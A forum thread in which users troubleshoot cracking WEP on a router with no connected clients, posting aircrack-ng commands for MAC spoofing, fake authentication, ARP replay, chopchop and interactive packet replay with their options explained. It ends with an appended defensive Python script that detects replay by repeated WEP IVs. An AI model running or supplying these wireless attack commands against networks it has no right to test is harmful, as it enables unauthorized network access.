Page 1 of 2
Results 1 to 10 of 19

Thread: wep crack with no clients

  1. #1
    Just burned his ISO
    Join Date
    Sep 2008
    Posts
    6

wep crack with no clients

I'm following a tutorial to try and crack my new router. All my hardware is compatible, as I cracked my old router with the same hardware. Below is the code I have used so far:

    Code:
    airmon-ng stop ath0
    ifconfig down wifi0
    macchanger --mac 00:11:22:33:44:55 wifi0
    airmon-ng start ath0
    
    airodump-ng -c 8 -w network.out --bssid 00:0F:B5:78:EC:B6 ath0
    //shows AP just fine with adequate power level
    aireplay-ng -1 0 -a 00:0F:B5:78:EC:B6 -h 00:11:22:33:44:55  ath0
    //says authentication is successful, as in the tutorial
    aireplay-ng -3 -b 00:0F:B5:78:EC:B6 -h 00:11:22:33:44:55 ath0
After I enter the last line of the code, the #data and packet columns I think should start to rapidly increase, but they don't increase at all.

Also, in aireplay-ng the ARP requests should start to increase, but they seem to stay the same, e.g.:
    Code:
    Read 839 packets (got 0 ARP requests), sent 0 packets...(322 pps)
    wireless card WG311t
    router belkin54g

Any ideas?

    Thanks in advance

  2. #2
    Junior Member imported_Timmay's Avatar
    Join Date
    Sep 2008
    Posts
    30


    When I was trying to crack my own WEP I ran into the same problem. It seems as though even though I was connected, there wasn't any activity. So since you're cracking your own WEP, go to another computer that is connected wirelessly (is that a word?) to the same network and go to any web page while aireplay-ng is going. As soon as I went to Google, or tried to check my mail, the packet request and sent - started.

  3. #3
    Junior Member
    Join Date
    Nov 2007
    Posts
    70


    @spurl:

Try the KoreK chopchop attack:

    aireplay-ng -4..............

  4. #4
    Just burned his ISO
    Join Date
    Sep 2008
    Posts
    6


@Timmay - I want to try and do a clientless attack, as I have never got it to work before.

@St3f@n - I have tried following the tutorial on the actual aircrack site

    hxxp://aircrack-ng.org/doku.php?id=how_to_crack_wep_with_no_clients

but when I enter this command
    Code:
    aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0
    or
    Code:
    aireplay-ng -4 -h 00:09:5B:EC:EE:F2 -b 00:14:6C:7E:40:80 ath0
it never asks me if I want to use the packet or not. I have left it running for hours.

Can anyone recommend any other good tutorials for a clientless WEP attack, or any ideas where I am going wrong?

    Cheers

  5. #5
    Just burned his ISO
    Join Date
    Sep 2008
    Posts
    6


Also, I quoted below this line
    Code:
    Read 839 packets (got 0 ARP requests), sent 0 packets...(322 pps)
It should actually be this:

    Code:
    Read 839 packets (got 0 ARP requests), sent 0 packets...(0 pps)
Does this mean my card is not injecting properly, even though it should (Netgear WG311T)?

  6. #6
    Member m1cha3l's Avatar
    Join Date
    May 2008
    Posts
    208


If you look further down the tutorial you mentioned, there is another approach.

    Code:
    aireplay-ng -2 -p 0841 -d ff:ff:ff:ff:ff:ff -a "$MAC" -h "$SOURCE" ath0
Let me know if it works.
    "At least black people knew when they where slaves" Doug stanhope

  7. #7
    Just burned his ISO
    Join Date
    Sep 2008
    Posts
    6


Michael, I will try your suggestion tonight when I get home, thanks.

Could this be a driver problem by any chance? Will reinstalling the madwifi drivers and aircrack suite do any good? I say this because I started up spoonwep and I had exactly the same problem.

  8. #8
    Member m1cha3l's Avatar
    Join Date
    May 2008
    Posts
    208


It shouldn't be a driver problem, as far as I am aware.

But I'm not too sure.

Couldn't see how re-installing could help, as Linux is not Windows and those types of things rarely help, I have found.

  9. #9
    Very good friend of the forum hhmatt's Avatar
    Join Date
    Jan 2010
    Posts
    660


You're probably failing on your authentication. "-1"

    Try reading more about the authentication techniques that you can use.

  10. #10
    Just burned his ISO
    Join Date
    Sep 2008
    Posts
    17

clientless attack

The attack you are doing is an ARP request replay attack... for you to pick up an ARP request out of the air, something has to happen...

Either a client on the network has to send an ARP request, or you can force an ARP request by pinging a non-existent IP address on your network. Try pinging an invalid IP and you should get an ARP.

Also, when you're doing fake authentication

    aireplay-ng -1 0 -a 00:0F:B5:78:EC:B6 -h 00:11:22:33:44:55 ath0

    that only associates you, but does not KEEP you associated...

You should do

    aireplay-ng -1 6000 -o 1 -p 10 -a 00:0F:B5:78:EC:B6 -h 00:11:22:33:44:55 ath0

The '-1 6000' means every six thousand seconds do another fake authentication, the '-o 1' means only send 1 packet at a time, and the '-p 10' means every 10 seconds send a keep-alive packet (this is the important one; it keeps you associated with the access point).

Without sending the keep-alive packets, you'd have to continually re-associate with the client by sending the command again. How do you know when you're not associated? When packet injection stops working.

IF THERE IS a client though, you should just use their MAC address as the -h parameter so fake auth is not required! (It's listed as STATION.)

And as someone suggested, once associated, try the interactive packet replay attack:

    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -a 00:0F:B5:78:EC:B6 -h 00:11:22:33:44:55 ath0

    I've had more luck with that command...

Also, I've found that if I lower the rate, I get much more consistent success!

Try

    iwconfig ath0 rate 1M (yes the M has to be capital)

Also, I do

    iwpriv ath0 rfmontx 1 (enable injection if it isn't already enabled)

iwpriv ath0 forceprism 1 (it's for more accurate PWR output reading, I think)

Except my interface is not called 'ath0', but you get the idea...

You should check out this page for reference:
www.aircrack-ng.org/doku.php?id=aireplay-ng&DokuWiki=ce5760523d62cad3df2c75e2f378bc84

And other aircrack-ng pages! They have helped me out!
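A defender-side check for the ARP request replay pattern described in the post above, as an added example that is not part of the original thread or of the aircrack-ng project. It assumes a constructed one-line-per-frame summary of WEP data frames (source MAC, destination MAC, WEP IV, length); a replay re-injects one captured frame unchanged, so the same IV recurs from one source far more often than a normal sender would ever reuse it.

```python
from collections import Counter, defaultdict


def parse_frame(line):
    """Parse one constructed frame summary: 'src,dst,iv_hex,length'.

    The format is an assumption for this example; a real feed would come from a
    capture tool that exposes the WEP IV of each data frame."""
    src, dst, iv_hex, length = line.strip().split(",")
    return {"src": src.lower(), "dst": dst.lower(),
            "iv": int(iv_hex, 16), "length": int(length)}


def find_replay_sources(frames, min_repeats=50):
    """Return {src: (iv, count)} for stations that re-sent one IV >= min_repeats times.

    A legitimate WEP sender changes its 24-bit IV on nearly every frame; an ARP
    request replay resends one captured frame verbatim, so a single IV shows up
    hundreds or thousands of times from the same source address."""
    per_src = defaultdict(Counter)
    for f in frames:
        per_src[f["src"]][f["iv"]] += 1
    flagged = {}
    for src, ivs in per_src.items():
        iv, count = ivs.most_common(1)[0]
        if count >= min_repeats:
            flagged[src] = (iv, count)
    return flagged


def build_sample_capture():
    """Constructed sample: one normal station and one station replaying a frame."""
    lines = []
    # Normal station: a fresh IV on every broadcast frame (hypothetical MAC).
    for i in range(200):
        lines.append(f"00:19:e3:aa:bb:cc,ff:ff:ff:ff:ff:ff,{0x100000 + i:06x},68")
    # Station using the spoofed MAC from the thread, re-sending one 68-byte
    # ARP-sized broadcast frame with the same IV (0xabcdef is a constructed value).
    for _ in range(300):
        lines.append("00:11:22:33:44:55,ff:ff:ff:ff:ff:ff,abcdef,68")
    return lines


def detect(lines, min_repeats=50):
    """Parse the feed and return the replaying sources."""
    return find_replay_sources([parse_frame(l) for l in lines], min_repeats)


if __name__ == "__main__":
    for src, (iv, count) in detect(build_sample_capture()).items():
        print(f"replay suspect {src}: IV {iv:06x} seen {count} times")
```

The threshold is deliberately coarse; on a real link, pair it with a rate check, since a replay also arrives at several hundred frames per second as the thread's "pps" counter shows.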

